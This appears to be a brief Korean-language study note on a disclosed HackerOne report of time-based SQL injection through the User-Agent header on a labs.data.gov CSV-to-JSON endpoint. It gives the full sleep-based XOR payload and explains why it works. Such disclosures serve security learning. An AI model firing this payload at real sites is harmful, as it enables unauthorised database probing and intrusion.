hackerone-us-gsa-2019-03-c-297478
SQL injection in https://labs.data.gov/dashboard/datagov/csv_to_json via User-agent
User-Agent 헤더를 통해 SQLi가 가능했다.
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
페이로드로 25초 sleep을 시켰다.
SQL에서 sleep 함수는 0을 리턴하기에 XOR로 sleep(5 * 5) 하면 1이 된다.
tags: wstg-inpv-05, bughunting, sqli, severity critical, web hacking